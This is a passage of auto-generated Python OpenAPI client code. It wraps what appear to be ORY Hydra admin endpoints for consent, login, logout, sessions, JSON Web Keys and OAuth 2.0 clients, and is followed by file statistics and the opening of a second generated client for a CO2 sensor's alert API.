code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.prometheus = Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/metrics/prometheus',
'operation_id': 'prometheus',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
},
'attribute_map': {
},
'location_map': {
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [],
},
api_client=api_client,
callable=__prometheus
)
def __reject_consent_request(
self,
consent_challenge,
**kwargs
):
"""Reject a Consent Request # noqa: E501
When an authorization code, hybrid, or implicit OAuth 2.0 Flow is initiated, ORY Hydra asks the login provider to authenticate the subject and then tell ORY Hydra now about it. If the subject authenticated, he/she must now be asked if the OAuth 2.0 Client which initiated the flow should be allowed to access the resources on the subject's behalf. The consent provider which handles this request and is a web app implemented and hosted by you. It shows a subject interface which asks the subject to grant or deny the client access to the requested scope (\"Application my-dropbox-app wants write access to all your private files\"). The consent challenge is appended to the consent provider's URL to which the subject's user-agent (browser) is redirected to. The consent provider uses that challenge to fetch information on the OAuth2 request and then tells ORY Hydra if the subject accepted or rejected the request. This endpoint tells ORY Hydra that the subject has not authorized the OAuth 2.0 client to access resources on his/her behalf. The consent provider must include a reason why the consent was not granted. The response contains a redirect URL which the consent provider should redirect the user-agent to. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.reject_consent_request(consent_challenge, async_req=True)
>>> result = thread.get()
Args:
consent_challenge (str):
Keyword Args:
body (RejectRequest): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CompletedRequest
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['consent_challenge'] = \
consent_challenge
return self.call_with_http_info(**kwargs)
self.reject_consent_request = Endpoint(
settings={
'response_type': (CompletedRequest,),
'auth': [],
'endpoint_path': '/oauth2/auth/requests/consent/reject',
'operation_id': 'reject_consent_request',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'consent_challenge',
'body',
],
'required': [
'consent_challenge',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'consent_challenge':
(str,),
'body':
(RejectRequest,),
},
'attribute_map': {
'consent_challenge': 'consent_challenge',
},
'location_map': {
'consent_challenge': 'query',
'body': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__reject_consent_request
)
def __reject_login_request(
self,
login_challenge,
**kwargs
):
"""Reject a Login Request # noqa: E501
When an authorization code, hybrid, or implicit OAuth 2.0 Flow is initiated, ORY Hydra asks the login provider (sometimes called \"identity provider\") to authenticate the subject and then tell ORY Hydra now about it. The login provider is an web-app you write and host, and it must be able to authenticate (\"show the subject a login screen\") a subject (in OAuth2 the proper name for subject is \"resource owner\"). The authentication challenge is appended to the login provider URL to which the subject's user-agent (browser) is redirected to. The login provider uses that challenge to fetch information on the OAuth2 request and then accept or reject the requested authentication process. This endpoint tells ORY Hydra that the subject has not authenticated and includes a reason why the authentication was be denied. The response contains a redirect URL which the login provider should redirect the user-agent to. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.reject_login_request(login_challenge, async_req=True)
>>> result = thread.get()
Args:
login_challenge (str):
Keyword Args:
body (RejectRequest): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CompletedRequest
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['login_challenge'] = \
login_challenge
return self.call_with_http_info(**kwargs)
self.reject_login_request = Endpoint(
settings={
'response_type': (CompletedRequest,),
'auth': [],
'endpoint_path': '/oauth2/auth/requests/login/reject',
'operation_id': 'reject_login_request',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'login_challenge',
'body',
],
'required': [
'login_challenge',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'login_challenge':
(str,),
'body':
(RejectRequest,),
},
'attribute_map': {
'login_challenge': 'login_challenge',
},
'location_map': {
'login_challenge': 'query',
'body': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__reject_login_request
)
def __reject_logout_request(
self,
logout_challenge,
**kwargs
):
"""Reject a Logout Request # noqa: E501
When a user or an application requests ORY Hydra to log out a user, this endpoint is used to deny that logout request. No body is required. The response is empty as the logout provider has to chose what action to perform next. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.reject_logout_request(logout_challenge, async_req=True)
>>> result = thread.get()
Args:
logout_challenge (str):
Keyword Args:
body (RejectRequest): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['logout_challenge'] = \
logout_challenge
return self.call_with_http_info(**kwargs)
self.reject_logout_request = Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/oauth2/auth/requests/logout/reject',
'operation_id': 'reject_logout_request',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'logout_challenge',
'body',
],
'required': [
'logout_challenge',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'logout_challenge':
(str,),
'body':
(RejectRequest,),
},
'attribute_map': {
'logout_challenge': 'logout_challenge',
},
'location_map': {
'logout_challenge': 'query',
'body': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/x-www-form-urlencoded'
]
},
api_client=api_client,
callable=__reject_logout_request
)
def __revoke_authentication_session(
self,
subject,
**kwargs
):
"""Invalidates All Login Sessions of a Certain User Invalidates a Subject's Authentication Session # noqa: E501
This endpoint invalidates a subject's authentication session. After revoking the authentication session, the subject has to re-authenticate at ORY Hydra. This endpoint does not invalidate any tokens and does not work with OpenID Connect Front- or Back-channel logout. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.revoke_authentication_session(subject, async_req=True)
>>> result = thread.get()
Args:
subject (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['subject'] = \
subject
return self.call_with_http_info(**kwargs)
self.revoke_authentication_session = Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/oauth2/auth/sessions/login',
'operation_id': 'revoke_authentication_session',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'subject',
],
'required': [
'subject',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'subject':
(str,),
},
'attribute_map': {
'subject': 'subject',
},
'location_map': {
'subject': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__revoke_authentication_session
)
def __revoke_consent_sessions(
self,
subject,
**kwargs
):
"""Revokes Consent Sessions of a Subject for a Specific OAuth 2.0 Client # noqa: E501
This endpoint revokes a subject's granted consent sessions for a specific OAuth 2.0 Client and invalidates all associated OAuth 2.0 Access Tokens. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.revoke_consent_sessions(subject, async_req=True)
>>> result = thread.get()
Args:
subject (str): The subject (Subject) who's consent sessions should be deleted.
Keyword Args:
client (str): If set, deletes only those consent sessions by the Subject that have been granted to the specified OAuth 2.0 Client ID. [optional]
all (bool): If set to `?all=true`, deletes all consent sessions by the Subject that have been granted.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['subject'] = \
subject
return self.call_with_http_info(**kwargs)
self.revoke_consent_sessions = Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/oauth2/auth/sessions/consent',
'operation_id': 'revoke_consent_sessions',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'subject',
'client',
'all',
],
'required': [
'subject',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'subject':
(str,),
'client':
(str,),
'all':
(bool,),
},
'attribute_map': {
'subject': 'subject',
'client': 'client',
'all': 'all',
},
'location_map': {
'subject': 'query',
'client': 'query',
'all': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__revoke_consent_sessions
)
def __update_json_web_key(
self,
kid,
set,
**kwargs
):
"""Update a JSON Web Key # noqa: E501
Use this method if you do not want to let Hydra generate the JWKs for you, but instead save your own. A JSON Web Key (JWK) is a JavaScript Object Notation (JSON) data structure that represents a cryptographic key. A JWK Set is a JSON data structure that represents a set of JWKs. A JSON Web Key is identified by its set and key id. ORY Hydra uses this functionality to store cryptographic keys used for TLS and JSON Web Tokens (such as OpenID Connect ID tokens), and allows storing user-defined keys as well. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_json_web_key(kid, set, async_req=True)
>>> result = thread.get()
Args:
kid (str): The kid of the desired key
set (str): The set
Keyword Args:
body (JSONWebKey): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
JSONWebKey
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['kid'] = \
kid
kwargs['set'] = \
set
return self.call_with_http_info(**kwargs)
self.update_json_web_key = Endpoint(
settings={
'response_type': (JSONWebKey,),
'auth': [],
'endpoint_path': '/keys/{set}/{kid}',
'operation_id': 'update_json_web_key',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'kid',
'set',
'body',
],
'required': [
'kid',
'set',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'kid':
(str,),
'set':
(str,),
'body':
(JSONWebKey,),
},
'attribute_map': {
'kid': 'kid',
'set': 'set',
},
'location_map': {
'kid': 'path',
'set': 'path',
'body': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__update_json_web_key
)
def __update_json_web_key_set(
self,
set,
**kwargs
):
"""Update a JSON Web Key Set # noqa: E501
Use this method if you do not want to let Hydra generate the JWKs for you, but instead save your own. A JSON Web Key (JWK) is a JavaScript Object Notation (JSON) data structure that represents a cryptographic key. A JWK Set is a JSON data structure that represents a set of JWKs. A JSON Web Key is identified by its set and key id. ORY Hydra uses this functionality to store cryptographic keys used for TLS and JSON Web Tokens (such as OpenID Connect ID tokens), and allows storing user-defined keys as well. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_json_web_key_set(set, async_req=True)
>>> result = thread.get()
Args:
set (str): The set
Keyword Args:
body (JSONWebKeySet): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
JSONWebKeySet
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['set'] = \
set
return self.call_with_http_info(**kwargs)
self.update_json_web_key_set = Endpoint(
settings={
'response_type': (JSONWebKeySet,),
'auth': [],
'endpoint_path': '/keys/{set}',
'operation_id': 'update_json_web_key_set',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'set',
'body',
],
'required': [
'set',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'set':
(str,),
'body':
(JSONWebKeySet,),
},
'attribute_map': {
'set': 'set',
},
'location_map': {
'set': 'path',
'body': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__update_json_web_key_set
)
def __update_o_auth2_client(
self,
id,
body,
**kwargs
):
"""Update an OAuth 2.0 Client # noqa: E501
Update an existing OAuth 2.0 Client. If you pass `client_secret` the secret will be updated and returned via the API. This is the only time you will be able to retrieve the client secret, so write it down and keep it safe. OAuth 2.0 clients are used to perform OAuth 2.0 and OpenID Connect flows. Usually, OAuth 2.0 clients are generated for applications which want to consume your OAuth 2.0 or OpenID Connect capabilities. To manage ORY Hydra, you will need an OAuth 2.0 Client as well. Make sure that this endpoint is well protected and only callable by first-party components. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_o_auth2_client(id, body, async_req=True)
>>> result = thread.get()
Args:
id (str):
body (OAuth2Client):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
OAuth2Client
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
kwargs['body'] = \
body
return self.call_with_http_info(**kwargs)
self.update_o_auth2_client = Endpoint(
settings={
'response_type': (OAuth2Client,),
'auth': [],
'endpoint_path': '/clients/{id}',
'operation_id': 'update_o_auth2_client',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'id',
'body',
],
'required': [
'id',
'body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(str,),
'body':
(OAuth2Client,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
'body': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__update_o_auth2_client
)
| 40.568681
| 1,340
| 0.489835
| 13,882
| 147,670
| 5.003602
| 0.038107
| 0.027987
| 0.022459
| 0.023323
| 0.896948
| 0.881644
| 0.866484
| 0.853743
| 0.842816
| 0.832206
| 0
| 0.005427
| 0.433527
| 147,670
| 3,639
| 1,341
| 40.57983
| 0.824927
| 0.403833
| 0
| 0.679934
| 1
| 0
| 0.215424
| 0.036073
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012852
| false
| 0
| 0.008706
| 0
| 0.034411
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b111b6ee6ef9fd786033c08cd7b060b0cb6b6b24
| 21,361
|
py
|
Python
|
ct-ep100/v1.0.x/ja/autogen-openapi-generator/python/ct_ep100_client/api/alert_api.py
|
y2kblog/poe-webapi-sensor-api
|
7c21c88e4a7f74f7bc09c5d4dfc9ff352a98d458
|
[
"MIT"
] | null | null | null |
ct-ep100/v1.0.x/ja/autogen-openapi-generator/python/ct_ep100_client/api/alert_api.py
|
y2kblog/poe-webapi-sensor-api
|
7c21c88e4a7f74f7bc09c5d4dfc9ff352a98d458
|
[
"MIT"
] | null | null | null |
ct-ep100/v1.0.x/ja/autogen-openapi-generator/python/ct_ep100_client/api/alert_api.py
|
y2kblog/poe-webapi-sensor-api
|
7c21c88e4a7f74f7bc09c5d4dfc9ff352a98d458
|
[
"MIT"
] | null | null | null |
"""
PoE対応 WebAPI CO2センサ API仕様
\"Try it out\"機能は、API仕様を製品と同一ネットワーク上のローカルPCにダウンロードしブラウザで開くことで利用できます。 # noqa: E501
The version of the OpenAPI document: 1.0.x
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from ct_ep100_client.api_client import ApiClient, Endpoint as _Endpoint
from ct_ep100_client.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from ct_ep100_client.model.alert import Alert
from ct_ep100_client.model.error import Error
from ct_ep100_client.model.inline_response200 import InlineResponse200
class AlertApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __add_alert_setting(
self,
**kwargs
):
"""アラート設定を1つ登録 # noqa: E501
指定した条件を満たしたときにWebhookによる通知やFTPサーバにCSV形式で保存するアラート機能の設定を1つ登録する。 製品の電源を切ってもアラート設定は保持される。アラート設定の削除か製品の初期化を行うことで設定が消去される。 アラート設定は最大5個まで設定可能 /alerts.html にブラウザからアクセスし操作することも可能 ※通知データの仕様は以下の\"Callbacks\"タブに記載 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_alert_setting(async_req=True)
>>> result = thread.get()
Keyword Args:
alert (Alert): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Alert
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.add_alert_setting = _Endpoint(
settings={
'response_type': (Alert,),
'auth': [
'basicAuth'
],
'endpoint_path': '/alerts',
'operation_id': 'add_alert_setting',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'alert',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'alert':
(Alert,),
},
'attribute_map': {
},
'location_map': {
'alert': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__add_alert_setting
)
def __alerts_alert_id_delete(
self,
alert_id,
**kwargs
):
"""指定したidのアラート設定を削除 # noqa: E501
指定したidのアラート設定を削除する。 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.alerts_alert_id_delete(alert_id, async_req=True)
>>> result = thread.get()
Args:
alert_id (int): 取得したいアラート設定のID
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['alert_id'] = \
alert_id
return self.call_with_http_info(**kwargs)
self.alerts_alert_id_delete = _Endpoint(
settings={
'response_type': None,
'auth': [
'basicAuth'
],
'endpoint_path': '/alerts/{alertId}',
'operation_id': 'alerts_alert_id_delete',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'alert_id',
],
'required': [
'alert_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'alert_id':
(int,),
},
'attribute_map': {
'alert_id': 'alertId',
},
'location_map': {
'alert_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__alerts_alert_id_delete
)
def __alerts_delete(
self,
**kwargs
):
"""登録済みアラート設定を全て削除 # noqa: E501
登録済みアラート設定を全て削除する。 /alerts.html にブラウザからアクセスし操作することも可能 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.alerts_delete(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
